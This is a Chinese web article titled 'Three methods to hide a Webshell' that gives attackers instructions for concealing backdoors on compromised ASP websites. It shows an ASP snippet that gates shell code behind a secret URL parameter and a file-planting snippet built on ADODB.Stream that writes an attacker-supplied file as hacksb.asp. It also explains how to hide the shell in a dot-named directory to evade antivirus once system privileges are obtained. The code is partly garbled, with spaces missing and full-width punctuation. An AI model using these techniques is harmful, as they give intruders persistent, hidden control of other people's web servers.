首页 运维 网络学院 查看内容

三种隐藏Webshell的方法

2010-1-20 09:35 803 0

摘要:   作者:普瑞斯特   第一种:   在我们要做手脚的asp文件里加入如下内容   <%ifrequest("action")="ok"then%>   shell代码插在这里 ...
关键词: asp 文件 普瑞 hacksb 作手脚 后面 时候 内容 网站 自动生成

  作者:普瑞斯特   第一种:   在我们要做手脚的asp文件里加入如下内容   <%ifrequest("action")="ok"then%>   shell代码插在这里   <%endif%>   访问的时候在你作手脚的asp文件后面加上?action=ok,即可   第二种:   在我们要做手脚的asp文件里加入如下内容   <%   onerrorresumenext   strFileName=Request。QueryString("filer")   setobjStream=Server。createObject("ABODB。Stream")   objStream。Type=1   objStream。Open   objStream。LoadFromFilestrFileName   objStream。SaveToFileServer。mappath("hacksb。asp"),2   %>   访问的时候在做手脚的asp文件后面加上?filer=xxx,   xxx为你本地上传的一个路径如C:\hacksb。asp,   上传后在做手脚的asp的同文件夹中会自动生成hacksb。asp   第三种:   前提得到system权限,   进入网站目录下一层   mkdirs…   copyhacksb。asps…/   这样杀毒软件找不到的   访问http://网站/s…/hacksb。asp即可
声明:文章版权归原作者所有 部分文章转自互联网 如有侵权请联系 [邮箱地址] 删除

路过

雷人

握手

鲜花

鸡蛋

最新评论

返回顶部